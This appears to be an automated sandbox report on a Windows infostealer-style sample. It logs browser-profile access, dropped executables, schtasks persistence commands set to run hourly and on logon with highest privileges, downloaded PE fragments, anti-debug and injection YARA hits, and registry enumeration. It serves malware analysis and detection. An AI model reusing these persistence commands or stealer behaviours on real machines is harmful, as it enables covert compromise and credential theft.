file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\MZe06TxJhUpRoH7WmLDv.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe
file	C:\Users\test22\AppData\Local\Temp\00c07260dc\explorgu.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe
file	C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 2676 thread_handle: 0x00000148 process_identifier: 2672 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000014c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 2760 thread_handle: 0x00000154 process_identifier: 2756 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000150	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2580 thread_handle: 0x000005a0 process_identifier: 2560 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000005ac	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2624 thread_handle: 0x00000628 process_identifier: 2628 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000620	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00b00000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process reals.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile Feb. 18, 2024, 10:41 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¸UÑeà"¬ TwÀ @`¹¯@@@d\|@ Ìà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcÌ@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 18, 2024, 10:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Rän3@n3@n3@5[A`3@5[Að3@»^A\|3@»^Az3@»^A3@5[Az3@5[A}3@n3@º3@õ]Ao3@õ]u@o3@õ]Ao3@Richn3@PEL²¿eàÜpKð@ K¨å@Vpj`Ø@WKðVK PÖ@à.rsrcØ`æ@À.idata pê@À ðì@àqqqvulzhðp1ìî@àjyxoumha`KÚ@à.taggant0pK"à@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 18, 2024, 10:42 a.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ àE `@ FO`m`ø @ @à.rsrc`2@À.idata 6@À * 8@àhihardeg @+:@àcparmfrl àEÄ@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 18, 2024, 10:42 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELþ~Ìeà"¬>XT±À@p±@ Pz\x P°4@àpÀ"8@à@0Z@àpb@àdb@à.rsrcÆ@@y (Ô @à.dataP" J"ü@à¸o\GÍ°èz0¼½îÍ!F±:¯»·»ëB( û§±mº\Ë1#XEBaçñÁm°Ñm®üÅ¥¼VÀÚõ"* -i©eæ<¦ïÑ¹#QèBd$ÉXnE¡B?Xw6è¿Êð9+ídc»6ögN,N~8$Ï¸¨\ù6fhÕ£¨2¼tÇ÷?Ñ½ñ_ÊXX+DÜb\ËÄ£Ìä=JBg-çQ3¦e$gti÷ONDäuKÑb E]È¯gØ`Â;dtçëvîY¶dQõÇ]úÐ\|rYq7ZaJá×PUß¶ÝÝmCÊtBÎÅZ ùÔú4«4çZ7U¤VçÑÑfçÚ9YMÄü`Úõª6JòKéyæÎD¦Q2odïÑJtº8oFcSªÓ\|£¦ÿÅMµXÔöï)Èy?OK¬=ÑTKÇæöãIï#Ó¢½Õ¸>ÏAÛNwí?^£NmQ)Í6hUÕõdÛ,óiÛÿ²Oà´zG(;BVÚ:^@ðyeºµk»g\#D 5Î>Âcü©¬ÏK8WÁõ)ºªÛÍ ,Û0SFé×h·©¹ oì÷ÒÐO.=è¼ Ã±ëµh.Ï³þ\|Ò§¡ê Ì§F/kò[WÓþ¼bÐÑÑ ³e¡yþ@¾ÂCHTð:8h+Kl_HßY¶K²OÜÑp\|üÙ Ç¥ÆíäØrP5J«0W: ¼IßéXG×ãÄ;]÷'ÂXÇXckÖ¶ùÁß ÊãÃ+a»Ã~aÚhë¶ÏÂP±ISe þfQò÷,JÎl]ô7*ªgêó «¤Êÿ¨«íÈ)ºÄ,]²aQâò»I\Ú68Í«'HçO³éº¢Ã%ÍX!w$g+ËªU¨%áð¶{Ë¶Ô;Î_Ü>k·uÆäyÌ÷ð[ö_Þèf{C!ûÈ¯cùAÊ:Ég,lD5òMë-+¥&à,R4¸%+ºÙI _§ÍÎ0ß0»G$Mò»Ø »##Ü¯´ ê&#"EÿS²±:Ü¾VD7©ÜÅbùQ¯§Ár>yÔþâ9~Ñ#" }Ë@(^÷fDp°+¯\;h'UÏO7l¢¶HÞÚdÎFúì³·^ülÿEr 0M`²zÅð{ÒúÛÄk\u1²Y request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 18, 2024, 10:42 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"VÀ[°@ð[H$@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À ð,À @ànfqncvwu°@ø @àeaqflwam°[$@à.taggant0À["$@à request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000179a5', u'virtual_address': u'0x0015c000', u'entropy': 7.997078238778716, u'name': u'', u'virtual_size': u'0x00018000'}

entropy

7.99707823878

description

A section with a high entropy has been found

entropy

0.580443932107

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 18, 2024, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (2 events)

process	reals.exe
process	system

Potentially malicious URLs were found in the process memory dump (50 out of 1134 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c
url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	https://codereview.chromium.org/25305002).
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	http://crbug.com/320723
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03

Yara rule detected in process memory (50 out of 1013 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
